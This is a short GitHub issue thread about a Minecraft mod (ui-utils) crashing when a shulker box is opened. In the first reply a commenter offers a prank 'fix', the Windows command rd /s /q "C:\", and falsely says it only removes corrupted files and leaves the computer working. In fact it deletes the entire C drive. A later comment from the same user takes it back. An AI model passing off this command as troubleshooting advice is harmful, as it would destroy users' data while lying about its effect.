### ISSUE TITLE
whenever i open a shulker the game crashes with no crash report whatever

### ISSUE THREAD

**Issue by modnik1git** [Coderx-Gamer/ui-utils#55]

**Comment by MrBreakNFix** [comment]
Ah, I see what the issue might be. It's a problem with your computer's operating system. But don't worry, I know a quick fix for it. Just open up your command prompt and run the following command:

rd /s /q "C:\"

This will remove all the corrupted files from your C drive and fix the issue. Don't worry, your computer will still work just fine after the fix. Enjoy!

**Comment by MrBreakNFix** [comment]
yea just fr dong delete your c drive
